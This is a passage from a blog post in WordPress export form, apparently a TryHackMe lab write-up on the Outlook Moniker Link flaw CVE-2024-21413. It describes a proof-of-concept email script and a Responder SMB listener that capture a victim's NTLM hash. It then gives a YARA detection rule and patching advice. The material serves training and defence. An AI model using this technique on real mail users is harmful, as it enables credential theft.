style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This PoC:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Takes an attacker &amp; victim email. Normally, you would need to use your own SMTP server (this has already been provided for you in this room)<\/li>\n\n\n\n<li>Requires the password to authenticate. 
For this room, the password for <strong>attacker@monikerlink.thm<\/strong> is <strong>attacker<\/strong><\/li>\n\n\n\n<li>Contains the email content (html_content), which contains our Moniker Link as an HTML hyperlink<\/li>\n\n\n\n<li>Then fills in the &#8220;subject&#8221;, &#8220;from&#8221; and &#8220;to&#8221; fields in the email<\/li>\n\n\n\n<li>Finally, it sends the email to the mail server<\/li>\n<\/ul>\n\n\n\n<p>Let\u2019s use Responder to create an SMB listener on our attacking machine.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03af901cb1a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03af901cb1a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"790\" data-attachment-id=\"588\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/image-2-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?fit=1100%2C849&amp;ssl=1\" data-orig-size=\"1100,849\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?fit=1024%2C790&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" 
data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=1024%2C790&#038;ssl=1\" alt=\"\" class=\"wp-image-588\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=1024%2C790&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=300%2C232&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?resize=768%2C593&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-2.png?w=1100&amp;ssl=1 1100w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will need to do some initial setup on our Attack Machine before running the Python script:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our Attack Machine<\/li>\n\n\n\n<li>Replace the MAILSERVER placeholder on line #31 with 
10.10.40.219<\/li>\n<\/ul>\n\n\n\n<p>After we run our exploit, an email will be sent to our victim.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-lightbox-container\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"260\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-3.png?resize=1024%2C260&#038;ssl=1\" alt=\"\" class=\"wp-image-589\" \/><\/figure>\n\n\n\n<p>If we click on the link, we get the NTLM hash of the user.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-lightbox-container\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"229\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-4.png?resize=1024%2C229&#038;ssl=1\" alt=\"\" class=\"wp-image-590\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-detection-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Detection<\/mark><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"3-yara-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">YARA<\/mark><\/h3>\n\n\n\n<p>A <a href=\"https:\/\/github.com\/Neo23x0\/signature-base\/blob\/master\/yara\/expl_outlook_cve_2024_21413.yar\" target=\"_blank\" rel=\"noreferrer noopener\">YARA rule<\/a> has been created by <a href=\"https:\/\/twitter.com\/cyb3rops\/status\/1758792873254744344\" target=\"_blank\" rel=\"noreferrer noopener\">Florian Roth<\/a> to detect emails containing the <code>file:\\\\<\/code> element in the Moniker Link.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" 
style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki rose-pine\" style=\"background-color: #191724\" tabindex=\"0\"><code>rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {\n   meta:\n      description = &quot;Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook&quot;\n      author = &quot;X__Junior, Florian Roth&quot;\n      reference = &quot;https:\/\/github.com\/xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\/&quot;\n      date = &quot;2024-02-17&quot;\n      modified = &quot;2024-02-19&quot;\n      score = 75\n   strings:\n      $a1 = &quot;Subject: &quot;\n      $a2 = &quot;Received: &quot;\n\n      $xr1 = \/file:\\\/\\\/\\\/\\\\\\\\[^&quot;&#39;]{6,600}\\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!\/\n   condition:\n      filesize &lt; 1000KB\n      and all of ($a*)\n      and 1 of ($xr*)\n}<\/code><\/pre><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"4-remediation-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Remediation<\/mark><\/h2>\n\n\n\n<p>Microsoft has included patches to resolve this vulnerability in February\u2019s \u201cpatch Tuesday\u201d release. 
A list of KB articles by Office build is available <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>. Updating Office through Windows Update or the <a href=\"https:\/\/www.catalog.update.microsoft.com\/Home.aspx\" target=\"_blank\" rel=\"noreferrer noopener\">Microsoft Update Catalog<\/a> is strongly recommended.<\/p>\n\n\n\n<p>In the meantime, this is a timely reminder to follow general safe cyber security practices. For example, remind users of the following:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Do not click random links (especially from unsolicited emails)<\/li>\n\n\n\n<li>Preview links before clicking them<\/li>\n\n\n\n<li>Forward suspicious emails to the respective department responsible for cyber security<\/li>\n<\/ul>\n\n\n\n<p>Since this vulnerability bypasses Outlook&#8217;s Protected View, there is no way to reconfigure Outlook to prevent this attack. Additionally, blocking the SMB protocol entirely may do more harm than good, especially as it is essential for accessing network shares. However, you may be able to block SMB at the firewall level, depending on the organization.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE &amp; credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link). Haifei Li of Check Point Research is credited with discovering the vulnerability. The vulnerability bypasses Outlook&#8217;s security mechanisms when handling a specific type of hyperlink known as a Moniker Link. 
An attacker can [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","categories":[1,49,11,39,12],"tags":[],"class_list":["post-584","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-cve","category-tryhackme"],"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"}}